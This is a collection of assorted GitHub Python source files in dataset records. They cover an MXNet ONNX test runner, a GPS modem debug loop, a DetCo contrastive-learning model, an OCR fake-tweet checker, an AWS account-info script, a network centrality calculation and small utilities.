'export']\nbackends = ['mxnet', 'gluon']\n# This is a pytest magic variable to load extra plugins\npytest_plugins = \"onnx.backend.test.report\",\n\n\ndef test_suite(backend_tests): # type: () -> unittest.TestSuite\n '''\n TestSuite that can be run by TestRunner\n This has been borrowed from onnx/onnx/backend/test/runner/__init__.py,\n since Python3 cannot sort objects of type 'Type' as Runner.test_suite()\n expects.\n '''\n suite = unittest.TestSuite()\n for case in backend_tests.test_cases.values():\n suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(case))\n return suite\n\n\ndef prepare_tests(backend, oper):\n \"\"\"\n Prepare the test list\n :param backend: mxnet/gluon backend\n :param oper: str. export or import\n :return: backend test list\n \"\"\"\n BACKEND_TESTS = onnx.backend.test.BackendTest(backend, __name__)\n implemented_ops = test_cases.IMPLEMENTED_OPERATORS_TEST.get('both', []) + \\\n test_cases.IMPLEMENTED_OPERATORS_TEST.get(oper, [])\n\n for op_test in implemented_ops:\n BACKEND_TESTS.include(op_test)\n\n basic_models = test_cases.BASIC_MODEL_TESTS.get('both', []) + \\\n test_cases.BASIC_MODEL_TESTS.get(oper, [])\n\n for basic_model_test in basic_models:\n BACKEND_TESTS.include(basic_model_test)\n\n std_models = test_cases.STANDARD_MODEL.get('both', []) + \\\n test_cases.STANDARD_MODEL.get(oper, [])\n\n for std_model_test in std_models:\n BACKEND_TESTS.include(std_model_test)\n\n # Tests for scalar ops are in test_node.py\n BACKEND_TESTS.exclude('.*scalar.*')\n\n return BACKEND_TESTS\n\n\nfor bkend in backends:\n for operation in operations:\n log = logging.getLogger(bkend + operation)\n if bkend == 'gluon' and operation == 'export':\n log.warning('Gluon->ONNX export not implemented. Skipping tests...')\n continue\n log.info('Executing tests for ' + bkend + ' backend: ' + operation)\n mxnet_backend.MXNetBackend.set_params(bkend, operation)\n BACKEND_TESTS = prepare_tests(mxnet_backend, operation)\n unittest.TextTestRunner().run(test_suite(BACKEND_TESTS.enable_report()))\n","repo_name":"hpi-xnor/BMXNet-v2","sub_path":"tests/python-pytest/onnx/backend_test.py","file_name":"backend_test.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"51"} +{"seq_id":"10561646089","text":"import math\nimport time\nimport SIM868\n\n\nSIM = SIM868.SIM868()\nSIM.write(\"AT+CGNSPWR=1\")\nSIM.write(\"AT+CGNSURC=1\")\n\nn_cont = \"y\"\nwhile n_cont != \"n\":\n SIM.get()\n n_cont = input(\"continue?\")\n\nCommand = input(\"command: \")\nwhile Command is not \"\":\n SIM.write(Command)\n Command = input(\"command: \")\n\n# AT+CGNSURC\n","repo_name":"Tysseract/RPi-GPS-Tracker","sub_path":"WindowsDebug.py","file_name":"WindowsDebug.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"71707229277","text":"import sys\n\ndef _red(txt):\n RED=\"\\x1b[1;31m\"\n NORMAL=\"\\x1b[0m\"\n return RED + txt + NORMAL\n\nparts = sys.stdin.readline().strip().split()\nbranch = parts.pop(0).ljust(10)\npath = parts.pop(-1)\nflags = ' '.join(parts)\nclean = (flags == '0 0 0 0 0 0')\n\nline=\"%s %s %s\" % ( flags, branch, path )\n\nif clean:\n print(line)\nelse:\n print(_red(line))\n","repo_name":"bryanhann/.local.bin","sub_path":"lib/fixline.py","file_name":"fixline.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"827302744","text":"# -*- coding: utf-8 -*-\n\nfrom collective.documentgenerator.adapters import GenerablePODTemplatesAdapter\n\nfrom plone import api\n\n\nclass GenerableDashboardPODTemplatesAdapter(GenerablePODTemplatesAdapter):\n \"\"\" \"\"\"\n def __init__(self, context):\n self.context = context\n\n def get_all_pod_templates(self):\n catalog = api.portal.get_tool(name='portal_catalog')\n brains = catalog.unrestrictedSearchResults(portal_type=\"DashboardPODTemplate\", sort_on='getObjPositionInParent')\n pod_templates = [self.context.unrestrictedTraverse(brain.getPath()) for brain in brains]\n\n return pod_templates\n","repo_name":"IMIO/Products.urban","sub_path":"src/Products/urban/docgen/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24620575887","text":"import torch\nimport torch.nn as nn\n\nfrom openselfsup.utils import print_log\n\nfrom . import builder\nfrom .registry import MODELS\n\n\n@MODELS.register_module\nclass DetCo(nn.Module):\n '''MOCO.\n Part of the code is borrowed from:\n \"https://github.com/facebookresearch/moco/blob/master/moco/builder.py\".\n '''\n\n def __init__(self,\n backbone,\n neck_1=None,\n neck_2=None,\n neck_3=None,\n neck_4=None,\n neck_p1=None,\n neck_p2=None,\n neck_p3=None,\n neck_p4=None,\n head=None,\n pretrained=None,\n queue_len=65536,\n feat_dim=128,\n momentum=0.999,\n **kwargs):\n super(DetCo, self).__init__()\n self.backbone_q = builder.build_backbone(backbone)\n self.backbone_k = builder.build_backbone(backbone)\n self.encoder_q_necks = nn.Sequential(builder.build_neck(neck_1),\n builder.build_neck(neck_2),\n builder.build_neck(neck_3),\n builder.build_neck(neck_4))\n self.encoder_k_necks = nn.Sequential(builder.build_neck(neck_1),\n builder.build_neck(neck_2),\n builder.build_neck(neck_3),\n builder.build_neck(neck_4))\n self.encoder_q_patch_necks = nn.Sequential(builder.build_neck(neck_p1),\n builder.build_neck(neck_p2),\n builder.build_neck(neck_p3),\n builder.build_neck(neck_p4))\n self.encoder_k_patch_necks = nn.Sequential(builder.build_neck(neck_p1),\n builder.build_neck(neck_p2),\n builder.build_neck(neck_p3),\n builder.build_neck(neck_p4))\n # self.backbone = self.encoder_q[0]\n for param in self.backbone_k.parameters():\n param.requires_grad = False\n for param in self.encoder_k_necks.parameters():\n param.requires_grad = False\n for param in self.encoder_k_patch_necks.parameters():\n param.requires_grad = False\n self.head = builder.build_head(head)\n self.init_weights(pretrained=pretrained)\n\n self.queue_len = queue_len\n self.momentum = momentum\n\n # create the queue\n self.register_buffer(\"queue_2\", torch.randn(feat_dim, queue_len))\n self.queue_2 = nn.functional.normalize(self.queue_2, dim=0)\n self.register_buffer(\"queue_3\", torch.randn(feat_dim, queue_len))\n self.queue_3 = nn.functional.normalize(self.queue_3, dim=0)\n self.register_buffer(\"queue_4\", torch.randn(feat_dim, queue_len))\n self.queue_4 = nn.functional.normalize(self.queue_4, dim=0)\n self.register_buffer(\"queue_5\", torch.randn(feat_dim, queue_len))\n self.queue_5 = nn.functional.normalize(self.queue_5, dim=0)\n self.register_buffer(\"local_queue_2\", torch.randn(feat_dim, queue_len))\n self.local_queue_2 = nn.functional.normalize(self.local_queue_2, dim=0)\n self.register_buffer(\"local_queue_3\", torch.randn(feat_dim, queue_len))\n self.local_queue_3 = nn.functional.normalize(self.local_queue_3, dim=0)\n self.register_buffer(\"local_queue_4\", torch.randn(feat_dim, queue_len))\n self.local_queue_4 = nn.functional.normalize(self.local_queue_4, dim=0)\n self.register_buffer(\"local_queue_5\", torch.randn(feat_dim, queue_len))\n self.local_queue_5 = nn.functional.normalize(self.local_queue_5, dim=0)\n self.register_buffer(\"queue_ptr\", torch.zeros(1, dtype=torch.long))\n # self.register_buffer(\"local_queue_ptr\", torch.zeros(1, dtype=torch.long))\n\n def init_weights(self, pretrained=None):\n if pretrained is not None:\n print_log('load model from: {}'.format(pretrained), logger='root')\n self.backbone_q.init_weights(pretrained=pretrained)\n self.backbone_k.init_weights(pretrained=pretrained)\n for neck in self.encoder_q_necks:\n neck.init_weights(init_linear='kaiming')\n for neck in self.encoder_k_necks:\n neck.init_weights(init_linear='kaiming')\n for neck in self.encoder_q_patch_necks:\n neck.init_weights(init_linear='kaiming')\n for neck in self.encoder_k_patch_necks:\n neck.init_weights(init_linear='kaiming')\n\n \"\"\"for param_q, param_k in zip(self.encoder_q.parameters(),\n self.encoder_k.parameters()):\n param_k.data.copy_(param_q.data)\"\"\"\n\n @torch.no_grad()\n def _momentum_update_key_encoder(self):\n \"\"\"\n Momentum update of the key encoder\n \"\"\"\n \"\"\"for param_q, param_k in zip(self.encoder_q.parameters(),\n self.encoder_k.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\"\"\"\n for param_q, param_k in zip(self.backbone_q.parameters(), self.backbone_k.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\n for param_q, param_k in zip(self.encoder_q_necks.parameters(), self.encoder_k_necks.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\n for param_q, param_k in zip(self.encoder_q_patch_necks.parameters(), self.encoder_k_patch_necks.parameters()):\n param_k.data = param_k.data * self.momentum + \\\n param_q.data * (1. - self.momentum)\n\n\n @torch.no_grad()\n def _dequeue_and_enqueue(self, k_2, k_3, k_4, k_5, k_l_2, k_l_3, k_l_4, k_l_5):\n # gather keys before updating queue\n keys_2 = concat_all_gather(k_2)\n keys_3 = concat_all_gather(k_3)\n keys_4 = concat_all_gather(k_4)\n keys_5 = concat_all_gather(k_5)\n local_keys_2 = concat_all_gather(k_l_2)\n local_keys_3 = concat_all_gather(k_l_3)\n local_keys_4 = concat_all_gather(k_l_4)\n local_keys_5 = concat_all_gather(k_l_5)\n\n batch_size = keys_2.shape[0]\n\n ptr = int(self.queue_ptr)\n # local_ptr = int(self.local_queue_ptr)\n assert self.queue_len % batch_size == 0 # for simplicity\n\n # replace the keys at ptr (dequeue and enqueue)\n self.queue_2[:, ptr:ptr + batch_size] = keys_2.transpose(0, 1)\n self.queue_3[:, ptr:ptr + batch_size] = keys_3.transpose(0, 1)\n self.queue_4[:, ptr:ptr + batch_size] = keys_4.transpose(0, 1)\n self.queue_5[:, ptr:ptr + batch_size] = keys_5.transpose(0, 1)\n self.local_queue_2[:, ptr:ptr + batch_size] = local_keys_2.transpose(0, 1)\n self.local_queue_3[:, ptr:ptr + batch_size] = local_keys_3.transpose(0, 1)\n self.local_queue_4[:, ptr:ptr + batch_size] = local_keys_4.transpose(0, 1)\n self.local_queue_5[:, ptr:ptr + batch_size] = local_keys_5.transpose(0, 1)\n ptr = (ptr + batch_size) % self.queue_len # move pointer\n # local_ptr = (local_ptr + batch_size) % self.queue_len # move pointer\n self.queue_ptr[0] = ptr\n # self.local_queue_ptr[0] = local_ptr\n\n @torch.no_grad()\n def _batch_shuffle_ddp(self, x, x_patch):\n \"\"\"\n Batch shuffle, for making use of BatchNorm.\n *** Only support DistributedDataParallel (DDP) model. ***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n # x_patch_gather = concat_all_gather(x_patch.view(-1, 9, x_patch.size(1), x_patch.size(2), x_patch.size(3)))\n x_patch_gather = concat_all_gather(torch.cat([patch.unsqueeze(0) for patch in x_patch.split(9, dim=0)], dim=0))\n\n num_gpus = batch_size_all // batch_size_this\n\n # random shuffle index\n idx_shuffle = torch.randperm(batch_size_all).cuda()\n\n # broadcast to all gpus\n torch.distributed.broadcast(idx_shuffle, src=0)\n\n # index for restoring\n idx_unshuffle = torch.argsort(idx_shuffle)\n\n # shuffled index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this], \\\n torch.cat([q.squeeze() for q in x_patch_gather[idx_this].split(1, dim=0)], dim=0), \\\n idx_unshuffle\n\n @torch.no_grad()\n def _batch_unshuffle_ddp(self, x, x_patch, idx_unshuffle):\n \"\"\"\n Undo batch shuffle.\n *** Only support DistributedDataParallel (DDP) model. ***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n # x_patch_gather = concat_all_gather(x_patch.view(-1, 9, x_patch.size(1), x_patch.size(2), x_patch.size(3)))\n x_patch_gather = concat_all_gather(torch.cat([patch.unsqueeze(0) for patch in x_patch.split(9, dim=0)], dim=0))\n\n num_gpus = batch_size_all // batch_size_this\n\n # restored index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this], \\\n torch.cat([q.squeeze() for q in x_patch_gather[idx_this].split(1, dim=0)], dim=0)\n\n def forward_train(self, img, patch, **kwargs):\n assert img.dim() == 5, \\\n \"Input must have 5 dims, got: {}\".format(img.dim())\n im_q = img[:, 0, ...].contiguous()\n im_k = img[:, 1, ...].contiguous()\n patch_q = torch.cat([p.squeeze() for p in patch[:, 0, ...].contiguous().split(1, dim=0)], dim=0)\n patch_k = torch.cat([p.squeeze() for p in patch[:, 1, ...].contiguous().split(1, dim=0)], dim=0)\n # compute query features\n q_2, q_3, q_4, q_5 = self.backbone_q(im_q) # queries: NxC\n q_2 = nn.functional.normalize(self.encoder_q_necks[0](q_2)[0], dim=1)\n q_3 = nn.functional.normalize(self.encoder_q_necks[1](q_3)[0], dim=1)\n q_4 = nn.functional.normalize(self.encoder_q_necks[2](q_4)[0], dim=1)\n q_5 = nn.functional.normalize(self.encoder_q_necks[3](q_5)[0], dim=1)\n p_q_2, p_q_3, p_q_4, p_q_5 = self.backbone_q(patch_q)\n # p_q_2 = nn.functional.normalize(self.encoder_q_patch_neck2(p_q_2), dim=1)\n def temp(x):\n z = []\n for p in x.split(9, dim=0):\n y = []\n for q in p.split(1, dim=0):\n y.append(q.squeeze())\n z.append(torch.cat(y, dim=0).unsqueeze(0))\n return z\n q_l_2 = nn.functional.normalize(self.encoder_q_patch_necks[0](torch.cat(temp(p_q_2), dim=0))[0], dim=1)\n q_l_3 = nn.functional.normalize(self.encoder_q_patch_necks[1](torch.cat(temp(p_q_3), dim=0))[0], dim=1)\n q_l_4 = nn.functional.normalize(self.encoder_q_patch_necks[2](torch.cat(temp(p_q_4), dim=0))[0], dim=1)\n q_l_5 = nn.functional.normalize(self.encoder_q_patch_necks[3](torch.cat(temp(p_q_5), dim=0))[0], dim=1)\n # q_l_2 = nn.functional.normalize(self.encoder_q_patch_necks[0](p_q_2.view(-1, 9 * p_q_2.size(1), p_q_2.size(2), p_q_2.size(3)))[0], dim=1)\n # q_l_3 = nn.functional.normalize(self.encoder_q_patch_necks[1](p_q_3.view(-1, 9 * p_q_3.size(1), p_q_3.size(2), p_q_3.size(3)))[0], dim=1)\n # q_l_4 = nn.functional.normalize(self.encoder_q_patch_necks[2](p_q_4.view(-1, 9 * p_q_4.size(1), p_q_4.size(2), p_q_4.size(3)))[0], dim=1)\n # q_l_5 = nn.functional.normalize(self.encoder_q_patch_necks[3](p_q_5.view(-1, 9 * p_q_5.size(1), p_q_5.size(2), p_q_5.size(3)))[0], dim=1)\n\n\n # compute key features\n with torch.no_grad(): # no gradient to keys\n self._momentum_update_key_encoder() # update the key encoder\n\n # shuffle for making use of BN\n im_k, patch_k, idx_unshuffle = self._batch_shuffle_ddp(im_k, patch_k)\n\n k_2, k_3, k_4, k_5 = self.backbone_k(im_k) # keys: NxC\n k_2 = nn.functional.normalize(self.encoder_k_necks[0](k_2)[0], dim=1)\n k_3 = nn.functional.normalize(self.encoder_k_necks[1](k_3)[0], dim=1)\n k_4 = nn.functional.normalize(self.encoder_k_necks[2](k_4)[0], dim=1)\n k_5 = nn.functional.normalize(self.encoder_k_necks[3](k_5)[0], dim=1)\n\n p_k_2, p_k_3, p_k_4, p_k_5 = self.backbone_k(patch_k)\n k_l_2 = nn.functional.normalize(self.encoder_k_patch_necks[0](torch.cat(temp(p_k_2), dim=0))[0], dim=1)\n k_l_3 = nn.functional.normalize(self.encoder_k_patch_necks[1](torch.cat(temp(p_k_3), dim=0))[0], dim=1)\n k_l_4 = nn.functional.normalize(self.encoder_k_patch_necks[2](torch.cat(temp(p_k_4), dim=0))[0], dim=1)\n k_l_5 = nn.functional.normalize(self.encoder_k_patch_necks[3](torch.cat(temp(p_k_5), dim=0))[0], dim=1)\n \"\"\"k_l_2 = nn.functional.normalize(\n self.encoder_k_patch_necks[0](p_k_2.view(-1, 9 * p_k_2.size(1), p_k_2.size(2), p_k_2.size(3)))[0], dim=1)\n k_l_3 = nn.functional.normalize(\n self.encoder_k_patch_necks[1](p_k_3.view(-1, 9 * p_k_3.size(1), p_k_3.size(2), p_k_3.size(3)))[0], dim=1)\n k_l_4 = nn.functional.normalize(\n self.encoder_k_patch_necks[2](p_k_4.view(-1, 9 * p_k_4.size(1), p_k_4.size(2), p_k_4.size(3)))[0], dim=1)\n k_l_5 = nn.functional.normalize(\n self.encoder_k_patch_necks[3](p_k_5.view(-1, 9 * p_k_5.size(1), p_k_5.size(2), p_k_5.size(3)))[0], dim=1)\"\"\"\n\n # undo shuffle\n # k, p_k = self._batch_unshuffle_ddp(k, p_k, idx_unshuffle)\n k_2, p_k_2 = self._batch_unshuffle_ddp(k_2, p_k_2, idx_unshuffle)\n k_3, p_k_3 = self._batch_unshuffle_ddp(k_3, p_k_3, idx_unshuffle)\n k_4, p_k_4 = self._batch_unshuffle_ddp(k_4, p_k_4, idx_unshuffle)\n k_5, p_k_5 = self._batch_unshuffle_ddp(k_5, p_k_5, idx_unshuffle)\n\n q_l = [q_l_2, q_l_3, q_l_4, q_l_5]\n q = [q_2, q_3, q_4, q_5]\n k_l = [k_l_2, k_l_3, k_l_4, k_l_5]\n k = [k_2, k_3, k_4, k_5]\n\n # compute logits\n # Einstein sum is more intuitive\n queue_l = [self.local_queue_2, self.local_queue_3, self.local_queue_4, self.local_queue_5]\n queue_g = [self.queue_2, self.queue_3, self.queue_4, self.queue_5]\n\n gg_pos, gg_neg = self.compute_logits(q, k, queue_g)\n gl_pos, gl_neg = self.compute_logits(q_l, k, queue_g)\n ll_pos, ll_neg = self.compute_logits(q_l, k_l, queue_l)\n\n losses = self.head(gg_pos, gg_neg, gl_pos, gl_neg, ll_pos, ll_neg)\n self._dequeue_and_enqueue(k_2, k_3, k_4, k_5, k_l_2, k_l_3, k_l_4, k_l_5)\n\n return losses\n\n def compute_logits(self, q, k, queue):\n # positive logits: Nx1\n pos_2 = torch.einsum('nc,nc->n', [q[0], k[0]]).unsqueeze(-1)\n pos_3 = torch.einsum('nc,nc->n', [q[1], k[1]]).unsqueeze(-1)\n pos_4 = torch.einsum('nc,nc->n', [q[2], k[2]]).unsqueeze(-1)\n pos_5 = torch.einsum('nc,nc->n', [q[3], k[3]]).unsqueeze(-1)\n # negative logits: NxK\n neg_2 = torch.einsum('nc,ck->nk', [q[0], queue[0].clone().detach()])\n neg_3 = torch.einsum('nc,ck->nk', [q[1], queue[1].clone().detach()])\n neg_4 = torch.einsum('nc,ck->nk', [q[2], queue[2].clone().detach()])\n neg_5 = torch.einsum('nc,ck->nk', [q[3], queue[3].clone().detach()])\n\n return [pos_2, pos_3, pos_4, pos_5], [neg_2, neg_3, neg_4, neg_5]\n\n def forward_test(self, img, **kwargs):\n pass\n\n def forward(self, img, patch, mode='train', **kwargs):\n if mode == 'train':\n return self.forward_train(img, patch, **kwargs)\n elif mode == 'test':\n return self.forward_test(img, **kwargs)\n elif mode == 'extract':\n return self.backbone_q(img)\n else:\n raise Exception(\"No such mode: {}\".format(mode))\n\n\n# utils\n@torch.no_grad()\ndef concat_all_gather(tensor):\n \"\"\"\n Performs all_gather operation on the provided tensors.\n *** Warning ***: torch.distributed.all_gather has no gradient.\n \"\"\"\n tensors_gather = [\n torch.ones_like(tensor)\n for _ in range(torch.distributed.get_world_size())\n ]\n torch.distributed.all_gather(tensors_gather, tensor, async_op=False)\n\n output = torch.cat(tensors_gather, dim=0)\n return output\n","repo_name":"Qianna00/openselfsup","sub_path":"openselfsup/models/detco.py","file_name":"detco.py","file_ext":"py","file_size_in_byte":16784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"70267708000","text":"#! /usr/bin/env python3\nimport argparse, build_utils, common, os, platform, subprocess, sys\n\ndef main():\n os.chdir(common.basedir)\n classpath = common.deps() + [\n \"dev\",\n \"test\",\n build_utils.fetch_maven(\"org.clojure\", \"tools.namespace\", build_utils.deps_version(\"tools.namespace\")),\n build_utils.fetch_maven(\"org.clojure\", \"java.classpath\", \"1.0.0\"),\n build_utils.fetch_maven(\"org.clojure\", \"tools.reader\", \"1.3.6\"),\n build_utils.fetch_maven(\"criterium\", \"criterium\", build_utils.deps_version(\"criterium\"), repo = common.clojars),\n build_utils.fetch_maven(\"com.clojure-goes-fast\", \"clj-async-profiler\", build_utils.deps_version(\"clj-async-profiler\"), repo = common.clojars),\n ]\n \n parser = argparse.ArgumentParser()\n parser.add_argument('--ns', default='examples')\n (args, _) = parser.parse_known_args()\n\n return subprocess.call([\"java\",\n \"--class-path\", build_utils.classpath_join(classpath),\n \"-ea\",\n \"-Djdk.attach.allowAttachSelf\",\n # \"-XX:+UnlockDiagnosticVMOptions\",\n # \"-XX:+DebugNonSafepoints\",\n \"clojure.main\", \"-m\", \"user\", \"--ns\", args.ns])\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"HumbleUI/HumbleUI","sub_path":"script/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":928,"dataset":"github-code","pt":"51"} +{"seq_id":"41104691533","text":"nums = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\ndictionary = {}\ndata = input()\nwhile data not in nums:\n name, phone = data.split('-')\n dictionary[name] = phone\n data = input()\nlast_data = data\n\nfor _ in range(int(last_data)):\n name=input()\n if name in dictionary:\n print(f\"{name} -> {dictionary[name]}\")\n else:\n print(f\"Contact {name} does not exist.\")","repo_name":"simeon1534/Python-Advanced","sub_path":"tuples_sets_exercises/phonebook2.py","file_name":"phonebook2.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3953843894","text":"import pytesseract\nfrom PIL import Image\nimport argparse\n\nimport re\n\nimport twitter_manager\n\ntweeter_handle_regex = re.compile('(?<=^|(?<=[^a-zA-Z0-9-_\\.]))@([A-Za-z]+[A-Za-z0-9]+)')\n\n\ndef get_text_from_image(image_path):\n\ttext = pytesseract.image_to_string(Image.open(image_path))\n\t# print(text)\n\treturn text\n\n\ndef get_tweet_handles(text):\n\ttweeter_handles = tweeter_handle_regex.findall(text)\n\treturn tweeter_handles\n\n\ndef get_handle_tweet_pair(chunks):\n\tpairs = []\n\n\tfor i in range(len(chunks)):\n\t\thandles = tweeter_handle_regex.findall(chunks[i])\n\t\tif handles == []:\n\t\t\thandle = None\n\t\telse:\n\t\t\thandle = handles[0]\n\t\tif handle is not None:\n\t\t\ttweet = chunks[i+1].replace('\\n', ' ')\n\t\t\tpairs.append((handle, tweet))\n\n\tprint(pairs)\n\treturn pairs\n\n\ndef get_chunks(text):\n\ttext = text.strip()\n\tchunks = text.strip().split('\\n\\n')\n\tfor chunk in chunks:\n\t\tif tweeter_handle_regex.findall(chunk) == []:\n\t\t\tchunks = chunks[1:]\n\t\telse:\n\t\t\tbreak\n\treturn chunks\n\t\n\ndef check_if_fake_tweet(image_path):\n\ttext = get_text_from_image(image_path)\n\tchunks = get_chunks(text)\n\thandle_tweet_pairs = get_handle_tweet_pair(chunks)\n\n\tfor pair in handle_tweet_pairs:\n\t\thandle, tweet = pair\n\t\tprint(u\"Searching for \\n {}: {}\".format(handle, tweet))\n\t\turl = twitter_manager.search_tweet(handle, tweet)\n\t\tif url is not None:\n\t\t\tprint(url)\n\t\telse:\n\t\t\tprint(\"NOT FOUND, May wish to Check Manually!\")\n\n\nif __name__ == '__main__':\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-i\", \"--image\", required=True, help=\"path to tweet image to be OCR'd\")\n\targs = vars(ap.parse_args())\n\n\timage_path = args['image']\n\n\tcheck_if_fake_tweet(image_path)","repo_name":"priyankpalod/did_they_tweet_this","sub_path":"tweet_detector.py","file_name":"tweet_detector.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74224086558","text":"import boto3\n\n\ndef get_aws_account_info():\n # Create an IAM client\n iam_client = boto3.client(\"iam\")\n response = iam_client.get_account_summary()\n print(response)\n try:\n # Get information about the AWS account\n response = iam_client.get_account_summary()\n\n # Print relevant information\n account_id = response[\"SummaryMap\"][\"AccountSummary\"][\"AccountMFAEnabled\"]\n account_name = response[\"SummaryMap\"][\"AccountSummary\"][\"AccountName\"]\n\n print(f\"AWS Account ID: {account_id}\")\n print(f\"AWS Account Name: {account_name}\")\n\n except Exception as e:\n print(f\"Error: {e}\")\n\n\nif __name__ == \"__main__\":\n # Get information about the AWS account\n get_aws_account_info()\n","repo_name":"mezni/work02","sub_path":"old/test/get_account.py","file_name":"get_account.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39713810811","text":"import numpy\n\n# Change as necessary\n#myfile = \"examples/mixedtie.csv\"\n#myfile = \"examples/triad.csv\"\n#myfile = \"examples/mostextreme.csv\"\n#myfile = \"examples/mostextreme_rivals.csv\"\n#myfile = \"examples/Level1Clusters_Active_Size_2_1_Inf_2_2_P_0.01_InnerSortedCorrelations.csv\"\n#myfile = \"examples/COPD.pvalued.csv\"\n#myfile = \"examples/Never/Never_9A/Never.pvalued.csv\"\n#myfile = \"examples/Social_networks/Karate/karate.csv\"\n\n#f = open(myfile, 'r')\n\n# Get the first line (names)\n#firstline = f.readline()\n#bacteria = firstline.split(',')\n#bacteria.remove('\\\"\\\"')\n\ndef pncentrality(bacteria, G):\n n = len(bacteria)\n m = numpy.zeros([n, n])\n bacteria[len(bacteria)-1] = bacteria[len(bacteria)-1].strip()\n for key in G.adj:\n for key2 in G.adj[key]:\n # TMC need to fix this, breaks for either CSV or GML\n if (bacteria[0].count(\"\\\"\") == 0):\n index1 = bacteria.index(key)\n index2 = bacteria.index(key2)\n else:\n index1 = bacteria.index(\"\\\"\"+key+\"\\\"\")\n index2 = bacteria.index(\"\\\"\"+key2+\"\\\"\")\n w = G.adj[key][key2]['weight']\n m[index1][index2] = w\n m[index2][index1] = w\n # Make the identity matrix I\n # and the adjacency matrix A\n # and the positive matrix P\n # and the negative matrix N\n #m = []\n p = []\n nv = []\n z = []\n for i in range(n):\n #mc = []\n zc = []\n pc = []\n nc = []\n #contents = line.split(',')\n for j in range(n):\n value = float(m[i][j])\n #mc.append(value)\n zc.append(0)\n if (value > 0):\n pc.append(value)\n nc.append(0)\n else:\n pc.append(0)\n nc.append(-value)\n #m.append(mc)\n z.append(zc)\n p.append(pc)\n nv.append(nc)\n\n # Check to make sure all entries (i, i) are 0\n for i in range(n):\n m[i][i] = 0\n p[i][i] = 0\n nv[i][i] = 0\n\n # Added TMC December 23, 2014\n onemat = []\n for i in range(n):\n omc = []\n for j in range(n):\n omc.append(1)\n onemat.append(omc)\n OneMatrix = numpy.matrix(onemat) \n\n\n ADJ = numpy.matrix(m)\n P = numpy.matrix(p)\n N = numpy.matrix(nv)\n #A = P - 2*N\n\n A = P - 2*N\n\n for i in range(n):\n z[i][i] = 1\n I = numpy.matrix(z)\n\n # Make the vector of ones\n Ones = []\n for i in range(n):\n Ones.append([1])\n O = numpy.matrix(Ones)\n\n # Compute hStar (traditional centrality)\n PN = ((I - (1.0/(2*n-2))*A).getI()) * O\n\n arr = PN.getA()\n retval = []\n for i in range(n):\n retval.append(arr[i][0])\n return retval\n #tuples = []\n #for i in range(n):\n # tuples.append([arr[i][0], bacteria[i].strip()])\n\n #tuples.sort()\n #tuples.reverse()\n #from tabulate import tabulate\n","repo_name":"movingpictures83/MATria","sub_path":"PNcentrality.py","file_name":"PNcentrality.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}